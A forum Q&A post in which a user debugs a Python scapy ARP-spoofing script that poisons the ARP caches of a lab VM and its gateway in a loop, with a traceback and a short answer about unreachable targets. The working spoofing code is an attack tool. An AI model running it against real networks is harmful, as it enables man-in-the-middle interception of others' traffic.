# Not able to get mac address - Kali Linux

Tags: python, virtual-machine, kali-linux

Here is the code that i am using to get mac address, it is working fine if i am getting mac address of ip= 10.0.2.1 but if i try to get mac address of 10.0.2.7, it is showing me list index out of bound exception, However i am using kali linux in virtual machine and window 10 also in virtual machine who's ip is 10.0.2.7.

```
#!/usr/bin/env python

import scapy.all as scapy
import time


def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc


def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)


while True:
    spoof("10.0.2.7", "10.0.2.1")
    spoof("10.0.2.1", "10.0.2.7")
    time.sleep(2)
```

here is the output i am getting on terminal:

```
root@kali:~/PycharmProjects/arp_spoof# python3 arp_spoof.py 
Traceback (most recent call last):
  File "arp_spoof.py", line 22, in <module>
    spoof("10.0.2.7", "10.0.2.1")
  File "arp_spoof.py", line 16, in spoof
    target_mac = get_mac(target_ip)
  File "arp_spoof.py", line 12, in get_mac
    return  answered_list[0][1].hwsrc
  File "/usr/lib/python3/dist-packages/scapy/plist.py", line 118, in __getitem__
    return self.res.__getitem__(item)
IndexError: list index out of range
root@kali:~/PycharmProjects/arp_spoof#
```

Comment: Seems like your either don't have an answered_list[0] or answered_list[0][1], can you print them ?

Answer (score 0):

`scapy.ARP` returns an empty `scapy.plist.SndRcvList` object if it can't reach the target ip.

I have tried `get_mac` in my network and it worked great.

Are your machines in the same network?